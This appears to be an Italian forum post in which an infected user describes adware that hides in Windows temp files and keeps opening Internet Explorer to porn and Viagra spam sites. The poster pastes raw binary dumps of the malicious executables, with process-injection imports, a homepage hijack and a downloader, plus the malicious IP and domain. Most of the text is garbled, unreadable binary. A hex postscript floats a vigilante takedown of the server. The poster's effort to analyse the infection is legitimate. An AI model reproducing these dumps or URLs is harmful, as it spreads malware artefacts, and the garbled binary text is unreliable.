http://85.114.141.207/adult http://85.114.141.207/meds s207.silver.fastwebserver.de http://dl.guarddog2009.com

Sono 5 file posteggiati nella cartella di C:\windows\temp.
Si chiamano? ( VRT1.tmp , VRT2.tmp ,VRT3.tmp ,VRT5.tmp ,VRT6.tmp ) non dovrebbero essere nocivi almeno sembra, li

stiamo studiando,una cosa è sicura gli antivirus non li registrano.
Praticamente ti apre una finestra di Internet Explorer (browser predefinito) e ti porta all'indirizzo

http://85.114.141.207/adult. tu la chiudi e riparte in automatico dopo alcuni minuti,il tutto molto fastidioso
Cancellando i 5 file come logica dovrebbe tornare stabile il sistema ma non è così tutto ritorna come prima ,non abbiamo ancora capito se anno infilato

qualcosa anche nella cartella System32 , sotto c'è il contenuto del file VRT2.tmp e VRT6.tmp ,il resto dei file

sono incomprensibili.


---------------------------------------------------------------------------------------
VTR2.tmp
------------
MZ�   ÿÿ ¸ @ ° º ´ Í!¸
LÍ!This program cannot be run in DOS

mode.$ wEÚ3$z‰3$z‰3$z‰3$z‰ $z‰:\ï‰2$z‰Rich3$z‰ PE L
 ©qJ à 

   3 

@     @  Ó       @ <

@ .text ¨   

à.rdata È
  @ @.data T
0 
@ À







è SHELL32.DLL

¸CB2ÿÐ
D$jj j è http://85.114.141.207/adult/ è open j ÿT$hÜ ¾t2„4ÿÖ¸4‚4BÿÐj0è& Lifetime access to all

porn resources è� Every day fresh passwords for paid PORN sites. Hundreds of passwords daily in your e-mail box.

Single payment, lifetime service! P¸rH2ÿÐ1º€î6 ÷âRÿÖééþÿÿh 0@ è/
‹Øh0@ Sè
+ãH1@ ¡n@ ‹ £@ ¡†@ ‹ £Z@

¡ž@ ‹ £a@ ¡¤@ ‹ £@ j jèÐ ‹ØÇ 0@ (
h 0@ Sè× h 0@ SèÒ …À„™ �5D0@ VèÖ ƒørÜð�Nü �~ü.exeuÊ�Nø

�~øoreruº�Nô �~ôexpluªÿ5(0@ j j:èl ‹ø¾3
j@h  Vj Wèm ƒø t+‹Ø¹3
j Qh @ SWèX j j ÿ5H1@ Sj j Wè j

è ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ%$ @ ÿ%( @ ÿ%, @ ÿ%8 @ ÿ%4 @





¼ Ò î ü ! ! ,! >!

N! V! h! ~! ®! ˜! | Š! ° ¼! 4 ¼ Ò î ü ! !

,! >! N! V! h! ~! ®! ˜! D CreateRemoteThread I CreateToolhelp32Snapshot u ExitProcess

)
GetProcAddress ©
LoadLibraryA Ö
OpenProcess ã
Process32First å
Process32Next sSleep –VirtualAllocEx

ÃWriteProcessMemory âlstrlenA KERNEL32.dll 
GetForegroundWindow »
MessageBoxA USER32.dll

SHELL32.DLL ShellExecuteA








-----------------------------------------------------------------------------------------------------
VTR6.tmp
------------
MZ�   ÿÿ ¸ @ ° º ´ Í!¸
LÍ!This program cannot be run in DOS

mode.$ wEÚ3$z‰3$z‰3$z‰3$z‰%$z‰:\ï‰2$z‰Rich3$z‰ PE L

J à 

   ó 

@     @  §       H P

H .text °   

à.rdata    @ @.data „
0   @ À







è SHELL32.DLL

¸CB2ÿÐ
D$jj j è http://85.114.141.207/meds/ è open j ÿT$hÜ ¾t2„4ÿÖ¸4‚4BÿÐj0è Fix your bed life èV

Problems with sex? Impotence? Buy Viagra securely and anonymously, WORLDWIDE SHIPPING P¸rH2ÿÐ1º€î6 ÷âRÿÖé)ÿÿÿh 0@

èq
‹Øh0@ Sè^
+ãx1@ ¡p@ ‹ £@ ¡ˆ@ ‹ £Y@ ¡ @ ‹ £`@ ¡¦@ ‹ £Ü@ j jè
‹ØÇP0@ (
hP0@ Sè
hP0@ Sè


…À„™ �5t0@ Vè
ƒørÜð�Nü �~ü.exeuÊ�Nø �~øoreruº�Nô �~ôexpluªÿ5X0@ j j:è® ‹ø¾ó j@h  Vj Wè¯ ƒø

t+‹Ø¹ó j Qh @ SWèš j j ÿ5x1@ Sj j WèI h'@ è� Ph'@ j
hD0@ h0@ h
ۏw Ph'@ j
hD0@ h0@ h €è[ j è

ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ%$ @ ÿ%( @ ÿ%, @ ÿ%@ @ ÿ%< @ ÿ%4 @





à ö ! ! 2! B! P! b! r!

z! Œ! ¢! ì! Ò! ¼! ˜ ®! Ô à! < Ì ú! 4

à ö ! ! 2! B! P! b! r! z! Œ! ¢! ì! Ò! ¼! D CreateRemoteThread I

CreateToolhelp32Snapshot u ExitProcess )
GetProcAddress ©
LoadLibraryA Ö
OpenProcess ã
Process32First

å
Process32Next sSleep –VirtualAllocEx ÃWriteProcessMemory âlstrlenA KERNEL32.dll 
GetForegroundWindow

»
MessageBoxA USER32.dll ™ SHSetValueA SHLWAPI.dll







SHELL32.DLL

ShellExecuteA Software\Microsoft\Internet Explorer\Main Start Page

---------------------------------------------------------------------

Ho fatto qualche prova, tanto di tempo ne ho a volontà perchè sono in cassa integrazione grazie alle politiche assurde dei nostri governanti,dopo aver ripulito tutto a mano compreso Regedit sembrerebbe un mutante, si è auto reinstallato tutto ma in forma diversa,ma forse questa volta ho avuto più fortuna: Sempre nella Temp di Windows i file hanno preso i nomi VRT1B.tmp,VRT1D.tmp eccetera, stesso gioco si apre internet che punta all'IP: 85.114.141.207:80 ,la mia sonda mi dice che il DNS di destinazione è (dl.guarddog2009.com ma facendo i LOOKUP l'indirizzo è 85.114.131.69 Quindi???
--------------------------------------------------------------------------------------------
Il file VRT1D.tmp è un programma eseguibile ( 0523.exe) scritto in Cinese.


---------------------------------------------------------------------------------------------
MZ�   ÿÿ ¸ @ ¸ º ´ Í!¸
LÍ!This program cannot be run in DOS mode.$ ·ÛósiˆósiˆósiˆldˆòsiˆRichósiˆ PE L
 8£J à 

   P @k ` p @   
 €         x ° p   UPX0 P   € àUPX1  `   @ à.rsrc  p
 @ À 2.00 UPX!

wHaÊûŒ§žÞA 4 @ &
»¤û¡’ ÿ%@$dddd (,ddddofdd 0kh  ÍÉò@ è
„0@»³ÿÿsyT£ê€ÖKŽu�©¼nX
 qÍóÿÿufgjgsmvcbsq e33(7)
¸2ÈØ@hÄÈ÷ÿ_VB5!ðvb6chs.dllá*µm°O

/̾÷Z³•ðÿ } éihFîà@œx7}ÿ�¦†‡0523 Projeç¾díct1ºO— Û¾/Èÿ\0í²œ5,q ÈsͶëšFLÐÛ˜§Àº®k¶R$`XXkº¦k^`d/ðlÓ,›® Ô<ô¿¨H´TuM×5j‹€G´pv_
ßhewg6jvpdf�knÝ°“-CÄ“x·M×t\¨0 —|$lÝÎ5#k\!w"ü¿e×¼$&ºH¹‚uáÞ’‡½ºPÄ`rÉÃ#@xÈ€öx¨/yØ�S|$Ü#Kä%<#!@.yÉœ"ü!¼ð2Nr$&ô
;.8㹇 .l!oîÂgÛ\ A¹ :o c­T¸ô u m0 nÝ_1]ÓuÝ a dStigÍ|î35d)i·½ëºr+tArLhb—n;×tcMofm ww{]óHdn la
e5!Ý溮yc Pjcm\XrS.ï b ìkU„ ¯ù"oD1w8@4žëÿ¿LÌ…d|ŸJŸw>û]ɇý
¡
pÝ�½� ” HïÙî+�Kô+Ö¬'›0ŒÇãð�l`C€
Module1þ¸% Äadvapi32ñ¿9ŸRegOpenKey—í^·—¤O¸�Éè3—¡öôý»ðÀtÿàhÄ#@&Ð
½ýOºCQueryValExAd�ï3Küôüß\ÈKurlmo}ûo¶nURLDownlo¸ToFi�g»®ÒYH3TW 47$“4h ûmÝW~Kernel+SMe�Ò= O°4Crɸ|n²-5”
0"š¦iº 0@P`š¦ëãdt„”¤éš¦i´ÄÔØܦiš¦àäèìðͲišôøü
4MÓ4} Ó ‡A6.DLL‘t*ÜÕÕI'O
T 9§×-ìêXJ KyÍu]MFH'J]³¹ÂYT#OT+IîsÍ#b PB'?VÑ
Ö}'HE7PåW®±¯õk£e››ëÄY}.{�
d®é^]×r£
zjÜÕm¹h×gO2³t m6Æ„¿
G{À<3 5%g3  67
 89HHž4 01ÀÜf3x3HH®45HH67@H89–LÓkb“uFGAÅkèš«ECB‹i9�x1ÒOrEa÷n²xÑaEu\7sÝØ/l'oi 7�åÆâccf#»1Ý`¿0 2½Y6Ó5ÝæõÃ9/bd£f÷¢ë6«i³kSm“Ñëº/\qKµußw»y›®®¡®A§CE½GËu5[3JL[Nѵ¹ºnQÍS×U9‘Xb¬$Õ;Z—+ØBb@+Dkàwõ¸?
¶Õu“¿tdÿý•
(d5¡a\·ÓÉ–m·lÿ<RK&l �dÄ—s�@&J¤d °´Ktù „
!‚Û¶�}«shÿsMn
n¯¿¯}‰ê7ëÜ6"9õ
ÍemG<?»<¶É!€&kf»Ý4l€ pÝVZ^Q#ƒ<lßÎÖnüX"qtÿ25¶k‚ÿ%$;°„o¦ßÖÜ6“8
KµØ^ú1:\ÿ_LÿÐó†_¾W#Hÿ*ýÇDÿ^

±ü­9o5Lÿ ”`pØîž©ü,ûû/
Jhš{ýTä®H‹D“LÿGr’‹ô 6lìtŽ0”˜!�ÉÞœ‚Ÿ`€œä€
r�LrP´tÈ$\?üAÉ$@¤0�L6Ÿì …\ “?„DÈ$ä6AÉ$tŸL2�LÜ dm»F„¨Ct‰2®×žµdÅqT6Ùúv¶lJ³þl*A
(üËö‡M<ÿ@y3µÖ¾sh`1`ÿ6™
™ÀƆ%Dª+\=[Ž
hld`{þý+¹ì�®üüðl\È÷ÿöjÿüàçôëôëûÏèÀnÞ+Ûën³¯ü.¶_ÆÛlXÿþ�F€ µeÛ})çaJ² lªDöìÒ!lü �Pûh0ÌÖ$g}@0X+DX…æYþë`4xÌB~n§p h
DZdd*+/7Ó4]`t\S
ãÁ
Ÿ_±ãÂ
ÛWýçdùx3J2%:lo\\eX
/50ézË\ÿþÛpìl�õMl¶ ùÝ%ž9bû=4 ”»uíô
H]š
_ÛOe»Ã©ö
üÀœ”›{3}Td$€ãý3v²÷= ”©
(;4ÁÔÔ=Mø¿å[¤ Ô/Hÿ

mÓcüö8¾((#ÝÛooü5I_üËýi–hèþ§I°»wý“@þ®Jü‹]ÛoYÿHH`ýþÚ9ÜåÙØþ_ØþÈþì¤OÈO¶Hf¸þÈþ˜þïÌu/(l%e`Ö’#ùÞØ Ÿ
Ü’IŽdàäH&9äèd’#™ì9’IŽðô™äH&ø �d’#ü

“É!‘Lr$
waÃÈ’þ~„€

Œ¦ËB(ö~
(ú–FËýæT$ØŒý'É$É É$0$É$@diÈPêl’‰ì`Ld'‰d’‰t’‰d’„d’‰d”¤‰d’‰´?1d’Äf$
`à�½4äï€
z¬]S‹˜
!ƃŒ=…"üÈÅ�œ°ö#3ä,*à1#A&ä@$èBd�\%&@dð‡'�A&ä(ø²þId)*óëýÈò‹üH+ j
È�rò,-�“ƒM*.&"$9/L:‰ÝŸ(uÛ‘±,øþ)è¨išeÓ˜(ÿ¸8ÈH|³¢‘ XŸ¬i¶HØÌ é€tfž ²@TÿAŽ¢eÿ›ÿVÿxÛVþÿ
DllFunctionCaX_Ù¶ÿÿ_vbaExceptHandlerÇ-Íûß@Âc&Engine£Z¶e…;dsü!ÿPE L
 8£J 

W1»Q7 8KQÜfƒEñ ñlöPù
.ö’M>+ Ù^$.R(oö¨Ì¤ (²dØæ²8'.textÌ�óÏB6 ˜`.dataX §KKìïºÀ.rsrc Ã@+çÜ7d'@„óZ @ ÿ `¾ `@ �¾ °ÿÿWƒÍÿë������ŠFˆG
Ûu‹ƒîüÛrí¸

Ûu‹ƒîüÛÀ
Ûsïu ‹ƒîüÛsä1Ƀèr
ÁàŠFƒðÿtt‰Å
Ûu‹ƒîüÛÉ
Ûu‹ƒîüÛÉu A
Ûu‹ƒîüÛÉ
Ûsïu ‹ƒîüÛsäƒÁ�ý óÿÿƒÑ
�/ƒýüvŠBˆGIu÷écÿÿÿ�‹ƒÂ‰ƒÇƒéwñ
ÏéLÿÿÿ^‰÷¹
ŠG,è<
w÷€?
uò‹Š_fÁèÁÀ†Ä)ø€ëè
ð‰ƒÇˆØâÙ�¾ @ ‹ ÀtE‹_�„0 h
óPƒÇÿ–Üh •ŠGÀt܉ùy·GPG¹WHò®Uÿ–àh Àt‰ƒÃëØÿ–èh ‹®äh �¾ ðÿÿ»  PTjSWÿÕ�‡×
€ €`(XPTPSWÿÕXa�D$€j 9Äuúƒì€é·£ÿÿ 8£J   ( € È € 
€ 8£J  1u P €2u x €3u   € 8£J
h Lq 0
° 8£J
� €r è ° 8£J
¸ lu (
° 8£J

à € 8£J
ø ˜v 0 ° 8£J


€ 8£J
 8
Ìv Ô
° dG ( @


ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÁÿÿü<ÿÃüø?üûÿüûÿüûÿýÿûÿýÿûÿýÿûÿýÿûÿýÿûÿýÿûÿýÿûÿýÿûÿÁÿûü=ÿûÃÁÿø
F i l e V e r s i o n 1 . 0 0 0

P r o d u c t V e r s i o n 1 . 0 0 ,

I n t e r n a l N a m e 0 5 2 3 < 
O r i g i n a l F i l e n a m e 0 5 2 3 . e x e øx Üx y ðx y y 0y @y d € KERNEL32.DLL MSVBVM60.DLL LoadLibraryA GetProcAddress VirtualProtect ExitProcess
------------------------------------------------------------
PS:
53 65 63 6f 6e 64 6f 20 69 6c 20 6d 69 6f 20 61 6d 69 63 6f
20 46 72 65 6e 6b 20 62 69 73 6f 67 6e 65 72 65 62 62 65 20
6f 73 63 75 72 61 72 67 6c 69 20 69 6c 20 73 65 72 76 65 72
63 6f 6d 65 20 61 69 20 76 65 63 63 68 69 20 74 65 6d 70 69
20 63 68 65 20 63 6f 6d 65 20 64 69 63 65 20 6c 75 69 20 73
70 65 67 6e 65 76 61 6e 6f 20 69 20 73 65 72 76 65 72 20 64
65 69 20 70 65 64 6f 66 69 6c 69 2e